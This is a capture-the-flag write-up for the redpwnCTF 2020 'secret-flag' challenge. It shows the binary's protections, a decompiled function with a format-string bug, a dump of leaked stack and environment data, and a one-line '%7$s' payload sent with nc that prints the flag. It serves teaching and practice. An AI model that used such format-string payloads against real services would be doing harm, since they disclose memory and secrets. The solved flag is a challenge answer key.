# (solved) pwn/secret-flag
There's a super secret flag in printf that allows you to LEAK the data at an address??
```
nc 2020.redpwnc.tf 31826
```
```bash
# checksec secret-flag
[*] '/root/redpwn/secret-flag/secret-flag'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
```
Ghidra disass
```c
undefined8 FUN_0010091a(void)
{
int __fd;
void *__buf;
long in_FS_OFFSET;
char local_28 [24];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
__buf = malloc(0x100);
__fd = open("flag.txt",0);
read(__fd,__buf,0x100);
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("I have a secret flag, which you\'ll never get!");
puts("What is your name, young adventurer?");
fgets(local_28,0x14,stdin);
printf("Hello there: ");
printf(local_28);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
```
So leak the file descriptor somehow?
```environment leak
����\x7f
�^\x1aW�
\x00/\x11
\xa25\x84(
�qKiKp\x0e\xaf
\xa2x86_64
ES_SERVI
999_TCP_
ERVICE_P
IN_PORT_
BERNETES
\x00MAIN_PO
MAIN_SER
1.100:99
ST=10.0.
_SERVICE
al/sbin:
=9999\x00MA
ADDR=10.
CE_PORT=
/usr/loc
CE_PORT=
443\x00HOST
0.142.0.
n-f7445c
ES_SERVI
T=443\x00KU
root\x00MAI
:/usr/bi
443\x00HOST
_PORT_HT
//10.0.1
BERNETES
0.11.100
root\x00MAI
et-flag
//10.0.1
//10.0.1
MAIN_SER
//10.0.1
RT_9999_
://10.0.
\x00MAIN_PO
\x00\x00\x00\x00\x00\x00\x00.
VICE_HOS
/secret-
```
so dumb, it was in the stack but because it was a variable pointing to the heap it only contained a reference to it. So i had to use %7$s instead of %7$p to dereference it.
```bash
echo '%7$s'|nc 2020.redpwnc.tf 31826
I have a secret flag, which you'll never get!
What is your name, young adventurer?
Hello there: flag{n0t_s0_s3cr3t_f1ag_n0w}
```
Sign in with Wallet
Connect another wallet